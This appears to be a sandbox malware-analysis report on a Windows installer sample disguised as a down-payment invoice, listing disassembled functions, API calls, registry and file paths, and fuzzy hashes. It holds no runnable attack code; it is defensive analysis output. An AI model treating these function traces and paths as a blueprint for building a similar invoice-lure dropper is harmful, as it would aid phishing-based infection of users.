                                                                                                                                                                                                                      • Instruction ID: 8f6184b1751bc6f8464962a3906593b7d55529d2b80af17ada2b9fd2c8434474
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a4177f0cfd93771cde9571277633078264a90cd98c48bbc9c9ceb04e0b4c611
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE41C2714003459AEF00DF35D984BC637B8BF163E5F044566F96ABA0C6DB79A0A4CB60
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402032 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 1039 402032-40203e 1040 402044-40205a call 402c41 * 2 1039->1040 1041 4020fd-4020ff 1039->1041 1052 40206a-402079 LoadLibraryExW 1040->1052 1053 40205c-402068 GetModuleHandleW 1040->1053 1042 40224b-402250 call 401423 1041->1042 1048 402ac5-402ad4 1042->1048 1049 40288b-402892 1042->1049 1049->1048 1055 40207b-40208a call 406831 1052->1055 1056 4020f6-4020f8 1052->1056 1053->1052 1053->1055 1059 4020c5-4020ca call 405450 1055->1059 1060 40208c-402092 1055->1060 1056->1042 1065 4020cf-4020d2 1059->1065 1061 402094-4020a0 call 401423 1060->1061 1062 4020ab-4020be call 6f1d177b 1060->1062 1061->1065 1072 4020a2-4020a9 1061->1072 1067 4020c0-4020c3 1062->1067 1065->1048 1068 4020d8-4020e2 call 403a78 1065->1068 1067->1065 1068->1048 1073 4020e8-4020f1 FreeLibrary 1068->1073 1072->1065 1073->1048
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08), ref: 004054AB
                                                                                                                                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                      • String ID: xWi
                                                                                                                                                                                                                      • API String ID: 334405425-1681388181
                                                                                                                                                                                                                      • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                                                                                                                                      • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 1075 4023e4-402415 call 402c41 * 2 call 402cd1 1082 402ac5-402ad4 1075->1082 1083 40241b-402425 1075->1083 1085 402427-402434 call 402c41 lstrlenW 1083->1085 1086 402438-40243b 1083->1086 1085->1086 1087 40243d-40244e call 402c1f 1086->1087 1088 40244f-402452 1086->1088 1087->1088 1092 402463-402477 RegSetValueExW 1088->1092 1093 402454-40245e call 4031d6 1088->1093 1097 402479 1092->1097 1098 40247c-40255d RegCloseKey 1092->1098 1093->1092 1097->1098 1098->1082 1100 40288b-402892 1098->1100 1100->1082
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nskD796.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nskD796.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskD796.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nskD796.tmp
                                                                                                                                                                                                                      • API String ID: 2655323295-1777428270
                                                                                                                                                                                                                      • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                                                                                                                                      • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401B77 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00695778), ref: 00401BE7
                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Global$AllocFree
                                                                                                                                                                                                                      • String ID: Call$xWi
                                                                                                                                                                                                                      • API String ID: 3394109436-2015566773
                                                                                                                                                                                                                      • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                                                                                                                                      • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$Enum
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 464197530-0
                                                                                                                                                                                                                      • Opcode ID: 52473162f27408a13de1c9895957726086a9f0b93d5d7a53d963e96a44f2b4b1
                                                                                                                                                                                                                      • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52473162f27408a13de1c9895957726086a9f0b93d5d7a53d963e96a44f2b4b1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76012EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76012EE0,00000000), ref: 00405D76
                                                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                        • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences, xrefs: 00401640
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences
                                                                                                                                                                                                                      • API String ID: 1892508949-79196314
                                                                                                                                                                                                                      • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                                                                                                                                      • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                                                                                                                        • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                      • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                                                                                                                      • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                                      • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                                      • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                                      • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
